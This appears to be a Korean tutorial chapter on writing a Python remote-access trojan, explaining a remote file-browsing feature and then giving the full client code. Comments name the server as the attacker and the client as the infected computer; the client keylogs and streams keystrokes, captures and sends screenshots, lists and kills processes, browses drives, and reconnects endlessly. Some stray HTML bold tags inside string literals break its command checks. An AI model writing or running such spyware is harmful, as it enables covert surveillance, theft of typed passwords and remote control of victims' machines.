# 파일 브라우징

원격지에 있는 드라이브의 파일 목록을 탐색하고 서버가 클라이언트에 있는 파일 목록에서 원하는 파일을 다운로드 하기 위해선 원격 탐색기와 같은 기능이 필요합니다. 

1. 서버는 클라이언트에게 브라우징 명령을 전송합니다.
2. 클라이언트는 최초 드라이브 목록을 서버에 전송합니다.
3. 서버는 특정 드라이브의 파일 폴더 목록을 요청합니다.
4. 클라이언트는 해당 폴더의 파일 목록을 전송하게 됩니다.
5. 3번과 4번이 반복됩니다.


<font color="red" style="background-color:#e9e9e9;font-weight:bold;"> 여기서 작성하는 파일 브라우징 방식은 윈도우 위주로 동작하게 구현되어있습니다.</font> 

![파일구조](images/19.jpg)

여기서 사용하는 ```psutil``` 라이브러리는 윈도우, 맥OS, 리눅스에서 모두 동작 가능한 라이브러리입니다만 윈도우의 파티션 개념과 리눅스의 파티션 개념이 다르기 때문에 리눅스나 맥의 경우에는 그에 맞게 코드를 수정해야 정상 동작을 할 수 있습니다.



### 서버 명령 전송

서버는 클라이언트로 파일 브라우징 명령을 내릴때 주의해야할 부분이 한가지 있는데 클라이언트가 몇개의 하드디스크 드라이브를 갖고 있는지를 알 수가 없는 부분입니다. 물론 여러가지 방법으로 이를 해결 할 수 있습니다. 예를 들어 서버가 명령을 주지 않았다 하더라도 서버와 클라이언트 접속이 성공하면 무조건 드라이브 목록을 백그라운드로 미리 전송을 하는것도 한가지 방법일 것 입니다. 여기서는 서버가 클라이언트에게 최초 브라우징 명령을 송신했을때 이 최초 명령에서 폴더 목록이 아닌 드라이브 목록을 요청하도록 할 예정입니다.<br><br>

<pre style="background-color:#eeeeee;margin:0px;padding:10px;">
def onBtnDir(self):
    conn_socket.send("<b>DIR|drive</b>".encode())
</pre>
위의 예제 코드에서 처럼 서버가 최초 클라이언트에게 파일 브라우징 명령을 내릴때 **"DIR | drive"** 처럼 문자열을 전송하도록 하고 클라이언트는 **DIR** 형태의 명령은 모두 브라우징 처리를 하도록 할 예정입니다. 구분자 (<b>|</b>) 뒤에는 폴더 이름을 사용할 예정인데 최초 명령에서는 폴더 이름이 아닌 **"drive"** 라는 문자열이 오면 드라이브 목록을 전송하도록 하겠습니다.


### 클라이언트에서 명령 수신

<pre style="background-color:#eeeeee;margin:0px;padding:10px;">
def get_messages():
    if recv_data[0:3] == "<b>DIR</b>":
        paths = recv_data.split("|")

        if paths[1] == "drive":
            drives = get_drives()
            send_socket("<b>ROT</b>", str(drives))
        else:
            results = get_dir(paths[1])
            send_socket("<b>DIR</b>", str(results))
</pre>

클라이언트는 **DIR** 명령이 수신되면 구분자 (<b>|</b>) 를 기준으로 문자열을 ```.split``` 한 뒤에 1번째 리스트의 문자열이 **drive** 인 경우에는 ```get_drives()``` 함수로 드라이브 목록을 구해 서버로 전송하거나 그렇지 않은 경우에는 폴더 목록을 구해서 서버로 전송합니다. 이때 드라이브 목록을 전송하는 경우에는 데이터 타입을 임의로 정한 **ROT** 로 전송하고 폴더 목록을 전송하는 경우에는 **DIR** 타입으로 전송하게 됩니다.<br><br>


<pre style="background-color:#eeeeee;margin:0px;padding:10px;">
def get_drives():
    results = []
    drps = psutil.disk_partitions()
    for dp in drps:
        results.append({
            "path": dp.device,
            "size": "0",
        })
    return results
</pre>

```get_drives()``` 함수에서는 psutil 라이브러리의 ```.disk_partitions()``` 함수를 사용하여 간단하게 드라이브의 목록을 구할 수 있습니다. 이때 서버로 전송하는 ```"path:경로, size:크기"``` 형태로 전송을 하게 됩니다. 이렇게 사이즈 정보를 전송하는 이유는 서버에 파일 목록을 출력할때 파일의 사이즈도 출력을 하기 위한 목적이고 서버에서는 클라이언트로 부터 전송받은 목록이 파일인지 폴더인지를 구분할 수가 없기 때문에 클라이언트에서 파일인지 폴더인지를 구분해서 전송하거나 아니면 위의 예제에서 처럼 그냥 사이즈 정보를 설정해서 전송하는 방법이 있을 수 있습니다.<br><br>

<pre style="background-color:#eeeeee;margin:0px;padding:10px;">
def get_dir(path):
    if not path[-1] == "\\":
        path += "\\"

    results = []
    file_list = os.listdir(path)
    for file in file_list:
        size = "0" if os.path.isdir(path + file) else os.stat(path + file).st_size
        results.append({
            "path": path + file,
            "size": size
        })
    return results
</pre>

클라이언트가 서버로부터 폴더 목록을 요청받게 되는 경우에는 ```get_dir()``` 함수에서 ```os.listdir()``` 함수를 사용하여 해당 폴더의 파일 및 서브폴더 목록을 구해 다시 서버로 전송하게 됩니다. 이때도 역시 드라이브 목록을 전송할때와 마찬가지로 ```"path:경로, size:크기"``` 형태의 규칙성을 지켜주고 있습니다.

### 클라이언트 전체 코드

In [ ]:
import socket
import threading
from pynput import keyboard
from PIL import ImageGrab
import numpy
import cv2
import psutil
import time
from sys import platform
import os

# 서버로부터 키로깅 명령이 왔을때만 키로깅을 수행하기 위한 상태변수
key_logging = False

# 서버(공격자)의 아이피 주소
REMOTE_IP = "localhost"
# 서버로 접속할 포트
REMOTE_PORT = 5988
# 메세지 받을 버퍼 사이즈
PACKET_SIZE = 1024

# 서버 접속용 소켓 변수
sock = None
# 서버와의 접속 여부를 판별하여 메세지를 받을지 말지 결정하는 변수
recv_thread = False

# 데이터의 구간을 나누기 위한 구분자
PARSE = ":::"
# 데이터의 끝을 의미하는 표기
EOF = "##EOF##"

# 서버로부터 키로깅 명령이 왔을때만 키로깅을 수행하기 위한 상태변수
key_logging = False

if platform == "win32":
    import win32gui
    import win32process

    def get_hwnds_for_pid(pid):
        '''pid 에 해당 하는 프로세스의 핸들값을 구하는 함수 입니다.
        일반적으로 윈도우에서는 pid 값만 갖고는 바로 윈도우 핸들을 알아낼수가 없습니다.'''
        def callback(hwnd, hwnds):
            '''EnumWindows() 함수에 의해 콜백되어질 함수
            hwnds 는 최종적으로 구해진 핸들을 다시 돌려주기 위한 레퍼런스형 변수입니다.'''

            # 윈도우가 Visible 속성이고 enabled 속성을 확인하는 이유는
            # 윈도우에는 사용자에 의해 실행된 프로세스 이외에도
            # 시스템 프로세스가 무수히 많습니다. 이를 걸러내기 위한 조건문 이라고 보시면 됩니다.
            if win32gui.IsWindowVisible(hwnd) and win32gui.IsWindowEnabled(hwnd):
                # 윈도우의 캡션을 구합니다.
                text = win32gui.GetWindowText(hwnd)
                if text:
                    # 해당 캡션의 pid 를 구해서 인자로 받은 pid 와 동일하면 해당 핸들을 hwnds 에 추가합니다.
                    _, found_pid = win32process.GetWindowThreadProcessId(hwnd)
                    if found_pid == pid:
                        hwnds.append(hwnd)
            return True

        # pid 는 프로세스 아이디로 한개의 프로세스에 부여되는 id 입니다만
        # 윈도우 핸들은 한개의 프로세스 내에서도 수개에서 수십개를 포함할 수 있습니다.
        # 그렇기 때문에 pid 에 해당하는 윈도우 핸들값은 복수개 입니다.
        hwnds = []

        # EnumWindows는 최상위 윈도우까지 모든 윈도우를 열거해주는 기능의 윈도우 API 함수 입니다.
        win32gui.EnumWindows(callback, hwnds)
        return hwnds


def get_drives():
    '''서버에서 최초 파일 브라우징 명령 요청시 드라이브 목록을 구하는 함수'''
    results = []
    drps = psutil.disk_partitions()
    for dp in drps:
        results.append({
            "path": dp.device,
            "size": "0",
        })
    return results


def get_dir(path):
    '''path 로 넘어온 대상폴더 혹은 드라이브의 파일폴더 목록을 구하는 함수'''

    # path 문자열의 맨 마지막은 c:\\ 처럼 \\ 로 끝나야 합니다.
    if not path[-1] == "\\":
        path += "\\"

    # 결과를 담을 리스트 변수
    results = []
    # 해당 폴더의 목록을 구합니다.
    file_list = os.listdir(path)
    for file in file_list:
        # 결과는 path + 현재 파일 혹은 경로 형태이고
        # 대상 경로가 파일인 경우에는 사이즈 값을 저장하고 폴더인경우에 사이즈 값은 0 으로 설정합니다.
        size = "0" if os.path.isdir(path + file) else os.stat(path + file).st_size
        results.append({
            "path": path + file,
            "size": size
        })
    return results


def process_kill(pid):
    '''프로세스를 강제 종료하는 함수'''
    # 전체 프로세스 목록을 반복합니다.
    for proc in psutil.process_iter():
        try:
            # 프로세스 이름, PID값을 가져옵니다.
            processName = proc.name()
            processID = proc.pid
            # 현재 반복중인 pid 값과 process_kill() 함수의 인자로 넘어온 pid 값이 같다면
            # 강제 종료 대상으로 판단하여 해당 프로세스를 강제 종료 합니다.
            if processID == int(pid):
                print("{} {} kill".format(processID, processName))
                proc.kill()
        except (psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess):
            pass


def elapsed_since(start):
    '''프로세스의 생성 시간 데이터를 인자로 받아
    현재까지 얼마동안 구동중인지를 계산 하는 함수'''
    return time.strftime("%H:%M:%S", time.gmtime(time.time() - start))


def get_process():
    '''현재 시스템의 프로세스 목록을 구해서 리턴하는 함수'''

    # 최종 결과를 담아 리턴할 리스트 변수
    results = []

    # psutil.process_iter() 함수를 실행하면 현재 실행중인
    # 모든 프로세스 목록을 순차적으로 구해 옵니다.
    for proc in psutil.process_iter():
        # psutil.process_iter() 는 여러가지 정보를 얻어오는데
        # 여기서 우리는 프로세스ID, name, cpu 점유율, 메모리 점유율, 생성시각에 대한 정보를 얻기로 설정합니다.
        pInfoDict = proc.as_dict(attrs=['pid', 'name', 'cpu_percent', 'memory_percent', 'create_time'])
        # vms 는 Virtual Memory Size 로 현재 프로세스가 사용하는 가상메모리의 크기 입니다.
        pInfoDict["vms"] = proc.memory_info().vms / (1024 * 1024)
        # title 은 현재 윈도우의 타이틀바의 캡션 내용이며 윈도우에서만 사용됩니다.
        title = ""

        # 윈도우의 경우에만 현재 프로세스의 타이틀 정보를 얻어 옵니다.
        if platform == "win32":
            # 윈도우의 경우 현재 pid 에 해당하는 윈도우 핸들값을 구해옵니다.
            hwnds = get_hwnds_for_pid(proc.pid)
            if len(hwnds) > 0:
                # getwindowtext() 함수는 윈도우 핸들값을 인자로 받아
                # 해당 핸들에 대한 캡션 값을 리턴합니다.
                title = win32gui.GetWindowText(hwnds[0])

        # 최종적인 프로세스 목록 결과는
        # pid, 프로세스이름, cpu점유율, 메모리 점유율, 생성시각, 가상메모리사이즈, 윈도우타이틀 형태로 리스트에 추가됩니다.
        str_list = "{},{},{},{},{},{},{}".format(pInfoDict.get("pid"), pInfoDict.get("name"), pInfoDict.get("cpu_percent"), pInfoDict.get("memory_percent"), elapsed_since(pInfoDict.get("create_time")), pInfoDict.get("vms"), title)
        results.append(str_list)
    return results


def get_screenshot():
    pil_image = ImageGrab.grab(bbox=None)
    open_cv_image = numpy.array(pil_image)
    # Convert RGB to BGR
    open_cv_image = open_cv_image[:, :, ::-1].copy()
    encode_param = [int(cv2.IMWRITE_JPEG_QUALITY), 90]
    result, imgencode = cv2.imencode('.jpg', open_cv_image, encode_param)
    data = numpy.array(imgencode)
    stringData = data.tostring()
    send_socket("IMG", stringData)


def on_press(key):
    '''키가 눌렸을때 동작하는 이벤트 함수'''

    # 키로깅 명령을 수행중일때만 키값을 서버로 전송
    if key_logging:
        data = str(key).replace("'", "").encode()
        send_socket("KEY", data)
    else:
        return False


def on_release(key):
    '''키를 떼었을때 동작하는 이벤트 함수'''

    # 테스트 종료를 위해 esc 키를 입력하면 종료(임시)
    if str(key) == 'Key.esc' or not key_logging:
        print('Exiting...')
        return False


def get_input_keyboard():
    '''서버에서 키로깅 명령이 있을때 키로깅 동작'''
    if key_logging:
        listener = keyboard.Listener(on_press=on_press)
        listener.start()


def send_socket(header, msg):
    buffer = bytearray()
    buffer.extend(header.encode())
    buffer.extend(PARSE.encode())

    if type(msg) == bytes:
        buffer.extend(msg)
    else:
        buffer.extend(msg.encode())

    buffer.extend(PARSE.encode())
    buffer.extend(EOF.encode())
    sock.send(buffer)


def connect_socket():
    '''서버에 접속하는 함수'''
    global sock

    # 기존의 소켓이 생성되어있으면 close 후 삭제
    if sock:
        sock.close()
        del sock

    # 여기서 try except 문을 반드시 써야하는 이유는
    # 클라이언트는 서버가 언제 구동될지 모르기 때문에
    # 만약 서버(공격자)가 구동되어 있지 않아 접속이 안될경우 오류가 발생됩니다.
    try:
        # TCP 소켓 생성
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # 서버로 접속 시도(접속되지 않으면 try except 문에 의해 False 를 리턴)
        sock.connect((REMOTE_IP, REMOTE_PORT))

    except Exception as e:
        print("Error {}".format(e))
        return False
    # 서버와 접속 성공시 True 리턴
    return True


def get_message():
    '''서버의 메세지를 수신하는 함수
    여기서 서버의 공격명령을 받아 해당 명령에 맞는 동작을 구현하게 됩니다.'''
    global recv_thread, sock, key_logging

    # 서버로의 메시지를 수신하기 위해 무한 루프로 동작합니다.
    while recv_thread:
        # 서버와의 접속이 끊겼을때 오류를 방지하기 위해 try exception 문으로 구현 합니다.
        try:
            # 서버에서 PACKET_SIZE 만큼의 byte 데이터를 수신하여
            # utf-8 로 decode 하여 문자열 형태로 변환 (byte => str) 합니다.
            recv_data = sock.recv(PACKET_SIZE).decode('utf-8')
            print("데이터 받음: {}".format(recv_data))

            if recv_data == "INPUT":
                if not key_logging:
                    key_logging = True
                    get_input_keyboard()
            elif recv_data == "SCREEN":
                get_screenshot()
            elif recv_data == "PROCESS":
                lists = get_process()
                print(lists)
                send_socket("PRO", str(lists))
            elif recv_data[0:3] == "KIL":
                pid = recv_data[4:]
                print(pid, " kill")
                process_kill(pid)
                lists = get_process()
                send_socket("PRO", str(lists))
            elif recv_data[0:3] == "<b>DIR</b>":
                paths = recv_data.split("|")

                if paths[1] == "drive":
                    drives = get_drives()
                    send_socket("<b>ROT</b>", str(drives))
                else:
                    results = get_dir(paths[1])
                    send_socket("<b>DIR</b>", str(results))
        except Exception as e:
            print("Exit get message {}".format(e))
            recv_thread = False
            break


if __name__ == "__main__":
    # 클라이언트(감염된 컴퓨터)는 접속이 끊기더라도
    # 계속 서버로의 접속을 시도하고 동작을 유지하기 위해
    # 기본적으로 무한 루프로 구현합니닫.
    while True:
        connect_socket()
        recv_thread = True
        th_g = threading.Thread(target=get_message, daemon=True)
        th_g.start()
        th_g.join()